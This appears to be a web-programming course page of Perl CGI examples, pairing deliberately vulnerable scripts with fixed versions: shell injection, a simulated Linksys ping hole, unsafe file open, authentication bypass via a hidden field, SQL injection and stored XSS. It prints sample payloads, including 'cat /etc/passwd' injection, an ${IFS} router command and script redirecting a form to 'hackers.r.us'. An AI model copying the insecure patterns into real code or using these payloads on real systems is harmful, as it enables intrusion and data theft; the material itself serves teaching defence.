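    printf '%s\n' "$2" | sed "
        s/.*$1=//
        s/&.*//
        s/[^0-9.+-]//g
        "
}

get_param x 'x=12&y=3'
get_param y 'x=12&y=3$(reboot)'
```

Stripping everything except numeric characters means text such as $(reboot) in a parameter never reaches expr or the generated HTML.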


Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Hidden Variable');
warningsToBrowser(1);

if (defined param('x')) {
    $x = param("x") + 1;
} else {
    $x = 0;
}

printf "2**%d = %d\n", $x, 2 ** $x;

print <<eof;
<form method="post" action="">
<input type=hidden name="x" value="$x">
<input type="submit" value="Next Power of 2">
</form>
</html>
eof

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

Two submit buttons are used to produce different actions

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Handling Multiple Submit Buttons</title>
</head>
<body>
eof
warningsToBrowser(1);

$hidden_variable = param("x") || 0;

if (defined param("increment")) {
	$hidden_variable++;
} elsif (defined param("decrement")) {
	$hidden_variable--;
}

print <<eof;
<h2>$hidden_variable</h2>
<form method="post" action="">
<input type=hidden name="x" value="$hidden_variable">
<input type="submit" name="increment" value="Increment">
<input type="submit" name="decrement" value="Decrement">
</form>
</body>
</html>
eof

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Alternating State');
warningsToBrowser(1);

$x = param('state') || 0;
$x++;
param("state", $x);

print start_form, "\n";

if ($x % 2 == 0) {
    print "What's your name?\n", textfield('name');
} else {
    print "What's your height?\n", textfield('height');
}

print hidden('state'), "\n";
print end_form, "\n";
print end_html, "\n";

Count words in a file.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Word Count</title>
</head>
<body>
eof

my $uploaded_file = param('filename');
if (defined $uploaded_file) {
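    my ($lines, $words, $bytes) = (0, 0, 0);
    while (my $line = <$uploaded_file>) {
        # split ' ' skips leading whitespace, so no empty first field is counted
        my @words = split ' ', $line;
        $words += @words;
        $bytes += length $line;
        $lines++;
    }
    # pass the filename as an argument so a % in it is not treated as a format
    printf "%s: %d lines %d words %d bytes\n", $uploaded_file, $lines, $words, $bytes;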
} 

print <<eof;
<form method="post" action="" enctype="multipart/form-data">
<input type="file" name="filename" value="Bitter.html">
<input type="submit" name="upload" value="Word Count File">
</form>
</body>
</html>
eof
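
How a line is split decides what is counted as a word. The sketch below is independent of CGI and only compares two ways of splitting a line that starts with whitespace; the function names and the sample string are made up for illustration.

```perl
use strict;
use warnings;

# Count the fields produced when splitting on the regex /\s+/.
# Leading whitespace produces an empty first field, which is counted.
sub count_fields_regex {
    my ($line) = @_;
    my @fields = split /\s+/, $line;
    return scalar @fields;
}

# Count the fields produced by the special pattern ' ' (awk-style splitting),
# which ignores leading whitespace.
sub count_fields_awk {
    my ($line) = @_;
    my @fields = split ' ', $line;
    return scalar @fields;
}

my $line = "  hello world\n";
printf "regex: %d, awk-style: %d\n", count_fields_regex($line), count_fields_awk($line);
# prints "regex: 3, awk-style: 2"
```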

Allow users to change a file

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Editing A File');
warningsToBrowser(1);

$filename = "editfile.data";
$file_content = param('content');

if (param('Save') && defined $file_content) {
    if (open FILE, '>', $filename) {
    	print FILE $file_content;
    	close FILE;
    	print "File saved\n", end_html;
    } else {
    	print "Save failed\n", end_html;
    }
    exit 0;
}

if (!defined $file_content && open F, '<', $filename) {
	$file_content = join "", <F>;
	param('content', $file_content);
}

print   start_form, "\n",
        textarea(-name=>'content', -rows=>10,-cols=>60), "\n",
        p, submit('Save'), "\n",
        end_form, "\n",
        end_html;

Create a pop-up menu with one entry for every file with the suffix .cgi in the current directory

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Choosing A File');
warningsToBrowser(1);

@cgi_files = glob("*.cgi");
$default = $cgi_files[rand @cgi_files]; # pick an element at random

print start_form, "\n",
    popup_menu('CGI files', \@cgi_files,  $default), "\n",
    end_form, "\n",
    end_html;

Demonstrates a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Shell');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure: $login may contain shell meta-characters
# e.g. it might be "andrewt;cat /etc/passwd"

$user_id =`/usr/bin/id $login`;
print "The user id of $login is $user_id\n", end_html;

Demonstrates removing a CGI security hole by restricting the login to expected characters

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print header, start_html('Insecure Shell Fixed');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

$login = substr($login, 0, 32); # limit login to 32 characters
$login =~ s/[^\w\-]//g;         # remove all but expected characters
$user_id =`/usr/bin/id $login`;
print "The user id of $login is '$user_id'\n", end_html;
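
Another way to avoid shell meta-characters is not to involve a shell at all. The following is a minimal sketch, assuming a Unix system; the helper name `capture_without_shell` is hypothetical, and `/bin/echo` is used as a stand-in for `/usr/bin/id` so the effect is easy to see.

```perl
use strict;
use warnings;

# Run a command given as a list (program, then arguments) and return its output.
# With two or more list elements Perl starts the program directly, so no shell
# ever interprets characters such as ; | or $ in the arguments.
sub capture_without_shell {
    my @command = @_;
    open my $pipe, '-|', @command or die "Cannot run $command[0]: $!";
    my $output = join '', <$pipe>;
    close $pipe;
    return $output;
}

# the ; is passed to echo as ordinary text, cat is never run
my $login = 'andrewt;cat /etc/passwd';
print capture_without_shell('/bin/echo', 'looking up', $login);
```

Filtering the input is still worthwhile with this approach, because a value beginning with - could be read by the program as an option.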

Demonstrates a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure: $login may contain shell meta-characters
# e.g. it might be "andrewt;cat /etc/passwd"

system "echo hello|mutt -e 'set copy=no' -s 'web message' $login";

print "Mail sent to $login\n", end_html;

The mail script with the CGI security hole probably fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail Fixed');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# This seems to avoid problems with shell special characters
# but it is safer to run mail directly rather than via the shell
$address = substr($address, 0, 256);
# Remove all but characters legal in e-mail addresses
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;
# Write each single quote as '\'' so it cannot end the shell's quoted string
# (a backslash alone does not escape a quote inside single quotes)
$address =~ s/'/'\\''/g;
system "echo hello|mutt -e 'set copy=no' -s  'web message' -- '$address'";
print "Mail sent to $address\n", end_html;
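
Inside a single-quoted shell word nothing is special except the single quote itself, which is conventionally written as `'\''`. A minimal sketch of that quoting rule as a reusable function; the name `shell_quote` and the sample address are hypothetical.

```perl
use strict;
use warnings;

# Wrap a string in single quotes for /bin/sh, writing each embedded
# single quote as '\'' (close quote, escaped quote, reopen quote).
sub shell_quote {
    my ($string) = @_;
    $string =~ s/'/'\\''/g;
    return "'$string'";
}

print shell_quote("o'brien\@example.com"), "\n";
# prints 'o'\''brien@example.com'
```

Quoting like this is easy to get wrong, which is why passing arguments as a list and skipping the shell is usually the safer choice.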

Simulates the security hole present in some Linksys routers

This security hole was exploited to allow the router's operating system to be upgraded by users, by entering a command like this: ;cp${IFS}*/*/nvram${IFS}/tmp/n ;*/n${IFS}set${IFS}boot_wait=on ;*/n${IFS}commit ;*/n${IFS}show>tmp/ping.log

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);



print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

Simulates the security hole present in some Linksys routers, with the security hole removed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	$host = substr $host, 0, 256;          # limit host name to 256 characters
	$host =~ s/[^\w\-\.]//g;               # remove all but permitted characters
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;
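
An alternative to deleting unexpected characters is to reject any input that does not match a pattern of what is allowed. The sketch below is one possible check, not the one the routers or the script above use; the function name `is_plausible_host` and its exact pattern are assumptions.

```perl
use strict;
use warnings;

# Return 1 if $host looks like a host name or dotted address, else 0.
# Only letters, digits, '.' and '-' are accepted, and the first and last
# characters must be alphanumeric, so the value can never look like an option.
sub is_plausible_host {
    my ($host) = @_;
    return 0 if !defined $host || $host eq '' || length($host) > 253;
    return $host =~ /\A[A-Za-z0-9](?:[A-Za-z0-9.\-]*[A-Za-z0-9])?\z/ ? 1 : 0;
}

for my $host ('www.cse.unsw.edu.au', '-f', ';cp${IFS}*/*/nvram${IFS}/tmp/n') {
    printf "%-32s %s\n", $host, is_plausible_host($host) ? 'accepted' : 'rejected';
}
```

A script could run ping only when the check succeeds, and pass the arguments as a list (`system 'ping', '-c', '1', $host`) so that no shell is involved.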

Demonstrates a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

# insecure: $filename might contain |, > or < characters
# $filename might also contain / or ..
open F, $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

Demonstrates removal of a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open Fixed');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

$filename = substr($filename, 0, 4096);
$filename =~ s/\///g;      # remove every /, not just the first
$filename =~ s/^\.*$//;    # reject names consisting only of dots, such as ..
open F, '<', $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

Demonstrates a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

if (param('password_checked')) {
    if (param('student_number') && param('new_mark')) {
        mark_changed_screen();
    } else {
        change_mark_screen()
    }
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        param('password_checked', 1);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="password_checked" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


Demonstrates fixing a CGI security hole. Note that the login and password are passed as hidden fields by the admin screen and authenticated again before a mark is changed.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script - fixed</title>
</head>
<body>
eof
warningsToBrowser(1);

if (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        if (param('student_number') && param('new_mark')) {
            mark_changed_screen();
        } else {
            change_mark_screen()
        }
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}
exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

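sub change_mark_screen {
    # only called after authenticate_password() succeeds, so these hold the
    # known-good credentials, which are checked again on the next request
    my $login = param('login');
    my $password = param('password');
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="login" value="$login">
<input type="hidden" name="password" value="$password">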
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


Demonstrates SQL injection

This script expects parameters such as: user=andrewt password=secret

It can be fooled by including SQL code in the password parameter, for example: user=andrewt password=' or '42'='42

These commands generate a suitable sqlite database for the script:

echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db
echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use DBI;

print header, start_html('SQL Injection');
if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be able to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"But try any user with password <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;
$user = param('user');
$password = param('password');
$res = $dbh->selectall_arrayref("SELECT * from passwd where user='$user' and password='$password'");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user='$user' and password='$password'\n",end_html;

The SQL injection script with the security hole fixed

This script expects parameters such as: user=andrewt password=secret

Unlike the previous script, it cannot be fooled by including SQL code in the password parameter, for example: user=andrewt password=' or '42'='42

These commands generate a suitable sqlite database for the script:

echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db
echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);
use DBI;

print header, start_html('SQL Injection - Avoided');
warningsToBrowser(1);

if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be able to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"Adding SQL will not help, e.g. try: <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;

$user = param('user');
$user = substr $user, 0, 64;          # limit user name to 64 characters
$user =~ s/\W+//g;                    # remove all but expected characters
$user = $dbh->quote($user);           # should be unnecessary
$password = param('password');
$password = substr $password, 0, 64;  # limit password to 64 characters
$password = $dbh->quote($password);   # quote SQL special characters

$res = $dbh->selectall_arrayref("SELECT * from passwd where user=$user and password=$password");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user=$user and password=$password\n",end_html;
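
DBI also supports placeholders, which keep user input out of the SQL text entirely. The following is a sketch only, assuming DBD::SQLite is installed; it uses an in-memory database in place of user.db, and the function name `authenticate` is hypothetical.

```perl
use strict;
use warnings;
use DBI;

# In-memory database standing in for user.db
my $dbh = DBI->connect('dbi:SQLite:dbname=:memory:', '', '', { RaiseError => 1 });
$dbh->do('CREATE TABLE passwd(user TEXT, password TEXT)');
$dbh->do('INSERT INTO passwd(user, password) VALUES (?, ?)', undef, 'andrewt', 'secret');

# Return 1 if a row matches, else 0.
# The values for the ? placeholders are bound as data and never parsed as SQL.
sub authenticate {
    my ($user, $password) = @_;
    my $rows = $dbh->selectall_arrayref(
        'SELECT * FROM passwd WHERE user = ? AND password = ?',
        undef, $user, $password);
    return @$rows ? 1 : 0;
}

print authenticate('andrewt', 'secret')        ? "Authenticated\n" : "Wrong password\n";
print authenticate('andrewt', "' or '42'='42") ? "Authenticated\n" : "Wrong password\n";
```

With placeholders there is no need to call `quote` or to strip characters from the password before the query.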

Demonstrates a cross-site scripting (XSS) attack

The code below allows a user to upload a string describing their status. This string is then included in a web page viewed by other users, which is a security hole because it allows a cross-site scripting attack.

A user can upload HTML, and it will be embedded in a web page viewed by other users.

This is a security hole because they can, for example, upload JavaScript which changes the page, such as by redirecting URLs.

For example, they could upload this JavaScript: <script>window.onload = function () {document.getElementsByTagName("form")[0].action = "http://hackers.r.us/hack.cgi";};</script>

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//g;
    $user = substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        # anchor the match so user "a" cannot match the line for "anna"
        last if ($correct_password) = /^\Q$user\E:(.*)$/;
    }
    
    # if supplied password is correct update user's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;


Demonstrates avoiding a cross-site scripting attack

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//g;
    $user = substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        # anchor the match so user "a" cannot match the line for "anna"
        last if ($correct_password) = /^\Q$user\E:(.*)$/;
    }
    
    # if supplied password is correct update user's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    
    # prevent an XSS attack by stopping HTML tags being included
    # this is not sufficient in other contexts
    # https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
    # escape & first, otherwise the & in &lt; and &gt; would be escaped again
    $user_status =~ s/&/&amp;/g;
    $user_status =~ s/</&lt;/g;
    $user_status =~ s/>/&gt;/g;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;
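
The escaping step can be kept in one place so every value written into the page goes through it. A minimal sketch, assuming the text is placed in an HTML element body or a double-quoted attribute; the function name `escape_html` is hypothetical, and other contexts (such as inside a script element) need different treatment.

```perl
use strict;
use warnings;

# Replace the characters that are special in HTML text with entities.
# & must be handled first, otherwise the & of &lt; and &gt; is escaped again.
sub escape_html {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    return $text;
}

print escape_html('<script>alert("R&D")</script>'), "\n";
# prints &lt;script&gt;alert(&quot;R&amp;D&quot;)&lt;/script&gt;
```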

Week 11  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday Oct 11 lecture topics:CGI

Friday Oct 13 lecture topics:Git


Demonstrates removing a CGI security hole by restricting the login to expected characters

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print header, start_html('Insecure Shell Fixed');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

$login = substr($login, 0, 32); # limit login to 32 characters
$login =~ s/[^\w\-]//g;         # remove all but expected characters
$user_id =`/usr/bin/id $login`;
print "The user id of $login is '$user_id'\n", end_html;

Demonstrates a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure: $login may contain shell meta-characters
# e.g. it might be "andrewt;cat /etc/passwd"

system "echo hello|mutt -e 'set copy=no' -s 'web message' $login";

print "Mail sent to $login\n", end_html;

The mail script with the CGI security hole probably fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail Fixed');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# This seems to avoid problems with shell special characters
# but it is safer to run mail directly rather than via the shell
$address = substr($address, 0, 256);
# Remove all but characters legal in e-mail addresses
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;
# Write each single quote as '\'' so it cannot end the shell's quoted string
# (a backslash alone does not escape a quote inside single quotes)
$address =~ s/'/'\\''/g;
system "echo hello|mutt -e 'set copy=no' -s  'web message' -- '$address'";
print "Mail sent to $address\n", end_html;

The mail script with the CGI security hole fixed by running mutt directly rather than via the shell

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('A Simple Example');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# Remove all but characters legal in e-mail addresses
# and reduce to maximum allowed length
$address = substr($address, 0, 256);
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;

open F, '|-', 'mutt', '-e', 'set copy=no', '-s', 'web message', '--', $address or die "Can not run mail";
print F "Hello\n";
close F;
print "Mail sent to $address\n", end_html;

Demonstrates a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

# insecure: $filename might contain |, > or < characters
# $filename might also contain / or ..
open F, $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

Demonstrates removal of a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open Fixed');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

$filename = substr($filename, 0, 4096);
$filename =~ s/\///g;      # remove every /, not just the first
$filename =~ s/^\.*$//;    # reject names consisting only of dots, such as ..
open F, '<', $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

Demonstrates a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

if (param('password_checked')) {
    if (param('student_number') && param('new_mark')) {
        mark_changed_screen();
    } else {
        change_mark_screen()
    }
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        param('password_checked', 1);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="password_checked" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


Demonstrates fixing a CGI security hole. Note that the login and password are passed as hidden fields by the admin screen and authenticated again before a mark is changed.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script - fixed</title>
</head>
<body>
eof
warningsToBrowser(1);

if (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        if (param('student_number') && param('new_mark')) {
            mark_changed_screen();
        } else {
            change_mark_screen()
        }
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}
exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

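sub change_mark_screen {
    # only called after authenticate_password() succeeds, so these hold the
    # known-good credentials, which are checked again on the next request
    my $login = param('login');
    my $password = param('password');
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="login" value="$login">
<input type="hidden" name="password" value="$password">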
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


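Demonstrates fixing a CGI security hole with a token: after a successful login the script issues a token, passes it as a hidden field and checks it again before changing a mark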

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# a token is accepted only if this script issued it within the last day,
# so a user can no longer gain access by setting a parameter directly in the URL

$token = param('token');
if (defined $token) {
	$token =~ s/[^\w\-]//g;
	$token_file = "issued_tokens/$token";
	# check we've issued token in the last day
	if (length($token) > 30 && -e $token_file && -M $token_file < 1) {
	    if (param('student_number') && param('new_mark')) {
	        mark_changed_screen();
	    } else {
	        change_mark_screen()
	    }
	} else {
	    login_screen();
	}
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
		# get a unique 128-bit UUID
		$token = `uuidgen`;
		chomp $token;
		$token_file = "issued_tokens/$token";
		open F, '>', "$token_file";
		close F;
        param('token', $token);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
